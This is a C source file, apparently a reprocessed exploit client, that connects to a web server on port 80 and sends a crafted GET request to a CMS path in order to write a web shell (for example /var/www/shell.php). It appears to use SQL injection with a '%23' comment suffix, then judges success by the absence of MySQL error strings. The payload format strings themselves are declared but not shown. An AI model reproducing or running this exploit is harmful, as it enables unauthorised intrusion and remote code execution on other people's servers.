
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int packet ;
typedef int loadsf ;
typedef int html ;
typedef int addr ;


 int AF_INET ;
 char* Exec ;
 char* GET ;
 int SOCK_STREAM ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 int getHost (char*) ;
 int htons (int) ;
 int inet_addr (int ) ;
 int printf (char*,...) ;
 scalar_t__ recv (int,char*,int,int ) ;
 scalar_t__ send (int,char*,int,int ) ;
 int snprintf (char*,int,char*,char*,...) ;
 int socket (int ,int ,int ) ;
 int strncat (char*,char*,int) ;
 scalar_t__ strstr (char*,char*) ;

int main (int argc,char **argv)
{
    int server,leak;
    char data[1024],html[1024];
    char packet[500],loadsf[500];

    struct sockaddr_in addr;

    if (argc < 3) {
       printf("Usage: %s host path file\n",argv[0]);
       printf("RunEx: %s localhost /cms /var/www/shell.php\n",argv[0]);
       exit(0);
    }

    server = socket(AF_INET,SOCK_STREAM,0);

    addr.sin_family = AF_INET;
    addr.sin_port = htons((int)80);
    addr.sin_addr.s_addr = inet_addr(getHost(argv[1]));

    leak = connect(server,(struct sockaddr*)&addr,sizeof(addr));

    if (leak < 0) {
       printf("connection refused..try again\n");
       exit(0);
    }

    snprintf(loadsf,sizeof(loadsf),Exec,argv[3]);
    strncat(loadsf,"%23",sizeof(loadsf));
    snprintf(packet,sizeof(packet),GET,argv[2],loadsf,argv[1]);

    if (send(server,packet,sizeof(packet),0) < 0) {
       printf("data sent error..\n");
    }

    while(recv(server,html,sizeof(html),0) > 0)
    {
        if (strstr(html,"MySQL") || strstr(html,"mysql_fetch_array")) {
           printf("Exploit unsuccessful..\n"); break;
        }
        else {
           printf("Exploit successful..shell: %s\n",argv[3]); break;
        }
   }

    return 0;
}
